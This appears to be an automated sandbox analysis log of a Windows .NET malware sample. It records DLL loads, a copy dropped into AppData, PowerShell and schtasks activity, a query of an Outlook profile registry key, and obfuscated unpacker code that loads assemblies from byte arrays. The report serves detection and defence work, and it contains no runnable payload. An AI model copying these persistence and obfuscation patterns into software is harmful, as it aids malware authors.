Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ckHregxJIq.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ckHregxJIq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ckHregxJIq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.ckHregxJIq.exe.365c208.1.raw.unpack, MainForm.cs	.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs	.Net Code: n1Icec0JHP System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A258FF pushfd ; retf	1_2_06A25955
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A51228 push eax; ret	1_2_06A51229
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 1_2_06A5093A push es; ret	1_2_06A5093C
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 15_2_06F21228 push eax; ret	15_2_06F21229

Source: ckHregxJIq.exe	Static PE information: section name: .text entropy: 7.890717109770628
Source: aFAsiNcQRJEVeL.exe.1.dr	Static PE information: section name: .text entropy: 7.890717109770628

Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, u3dyRKzJYCE1BncR3W.cs	High entropy of concatenated method names: 'hblmbnX0xl', 'GPPmlRs3ML', 'knkmq0VWeL', 'd0VmtDA3SB', 'cEkm9vVlRP', 'W9jmUFL9f1', 'ipOm0llW7B', 'j8NmnCafGf', 'E4SmJoARd9', 'gOLm32KLD7'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, TWVDqCskDMqZf5rRyj.cs	High entropy of concatenated method names: 'K0qmaKOaGv', 'bo9mVPFUPJ', 'rYtmAHu33D', 'mWcm7EYYHa', 'I4UmBWB2Kf', 'KXimh5kH7m', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, LZRMUE2Fj3XlcXb5N2.cs	High entropy of concatenated method names: 'Dispose', 'biEZrvqo41', 'iBrN9kOXMn', 'AcEJry57if', 'UOaZsyqvEa', 'IQbZzcd8xW', 'ProcessDialogKey', 'gdeN1v9Xvu', 'WRANZfCNDM', 'K3ONNQWVDq'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, mc80r04br1raHZc02R.cs	High entropy of concatenated method names: 'Keu7DG6TUn', 'RKP7aQ6MCc', 'd8K7AXQ3Gq', 'CudAsJKIGV', 'gIXAzedRce', 'l8j71JXNUI', 'rIC7Zm1WN2', 'bNH7Ne9uWX', 'Q3e7iiu7c6', 'b9I7cS0UAH'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, MkFTk1Zp1VPy5rmC0B4.cs	High entropy of concatenated method names: 'C9Rq5WLLuxVch', 'R2En7RdOu0vkobh8FHc', 'k2DrHUdvn0LcWsyt1Mi', 'r9o6IadFZHtrQjPbCAJ', 'jo2WLldcXQ7XBDgSMqB', 'owPHard4B4aFAq8PMYc'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, FQNciltNv6xTBg4mDn.cs	High entropy of concatenated method names: 'irdApV9rnu', 'LlfA2E7aH5', 'AXZAVX5BHj', 'f2sA7gX0x2', 'sEiAhHeINd', 'WcvVdt4MPl', 'wyhVOV1bOi', 'xfpVjonIDq', 'NwWVHdNKul', 'MDsVr2eRGr'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, HB1KvCqepuAVmDoRkk.cs	High entropy of concatenated method names: 'RKCaF4jIYI', 'AgFabMEEQG', 'shNaltvgui', 'CSEaqkVpGT', 'ADmaCmndjD', 'gMuayGXId7', 'tVrauBqohj', 'zhwaX0OgrF', 'Nl2aBlZHLu', 'bq5amjTGU0'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, lOo23tKDyq8RMS9L0O.cs	High entropy of concatenated method names: 'LND5lXQM6J', 'TdF5q9YAA9', 'GiQ5tVNqAh', 'ott59JufbZ', 'rXy5ULM2ai', 'zJJ5015xEF', 'YI554Je9ly', 'Ksd5ol9dwf', 'QBj5gKFpf6', 'nsZ56FuS9Z'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, cy90LWZZANC1R9g8UDH.cs	High entropy of concatenated method names: 'qevms8owrp', 'rBMmzPt90o', 'GxjS1JT9nn', 'RLqSZ6gN2V', 'VqHSNfr2G7', 'xL9SiW1feA', 'R9XSc4jwPs', 'OZySpViCyk', 'sYfSDeUZmf', 'q7AS2wHWmA'
Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, nV4DjUcygVBEuQl90c.cs	High entropy of concatenated method names: 'dU1Z7gAuJ8', 'GVMZhCIOf3', 'oepZfuAVmD', 'LRkZLkCsTP', 'H3sZCMt8QN', 'dilZyNv6xT', 'AgTBGUxdh4pnEtrtPu', 'nPuDUeaYRLAHjOuYgS', 'JcyZZiCZwL', 'sOKZiSEu9y'
